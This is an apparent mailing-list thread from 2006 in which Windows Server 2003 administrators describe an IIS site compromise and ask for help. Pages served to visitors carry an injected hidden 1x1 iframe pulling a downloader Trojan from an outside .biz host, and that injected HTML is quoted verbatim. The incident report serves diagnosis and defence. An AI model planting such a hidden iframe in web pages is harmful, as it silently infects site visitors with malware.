| dcote@dgmdata.com 2006-12-09, 1:35 am |
| We had the same problem on our windows 2003 server today.
We cannot find any information anywhere.
Any ideas???
Paul Oliver a =E9crit :
> Our website was compromised sometime in the last few days, but our
> Antivirus (Symantec Corporate) when run on the server doesn't detect it.
>
> It is a Windows Server 2003 Standard server, running SP1 and all the
> latest patches. IIS sends down a website to the user with IFRAMEs
> injected into the HTML:
>
> <TD><TABLE><TR><TD><A HREF=3D"news.asp?ID=3D194" TARGET=3D_self ><IMG
> NAME=3D"news194" SRC=3D"images/newsClip.png" ALT=3D"*" BORDER=3D0
> CLASS=3D"ltblue"></a><iframe src=3Dhttp://xaqjlyswly.biz/dl/adv448.php
> width=3D1 height=3D1></iframe></TD></A></TR></TABLE></TD>
>
> The iframe code above pointing to xaqjlyswly.biz does not come from our
> code. I looked at the ASP function that generates this link and there
> is nothing there that would put that on the page.
>
> The iframe tries to get the user's browser to download the Downloader
> virus which, according to Symantec "connects to the Internet and
> downloads other Trojan horses"
>
> http://www.symantec.com/security_re...=3D2002-101518=
-4323-99
>
> My local antivirus on my machine caught downloader getting installed
> after browsing the site on the infected server.
>
> I used Agent Ransack to look for the string ".biz" across all our
> websites source code. The string wasn't found anywhere.
>
> That all leads me to believe that something is getting injected into the
> code before it is sent to the end user.
>
> I found an older virus that has similar characteristics called
> Download.Ject which infected IIS also. I followed Microsoft's
> suggestions for detecting Download.Ject and we don't have it.
>=20
> Any ideas?
|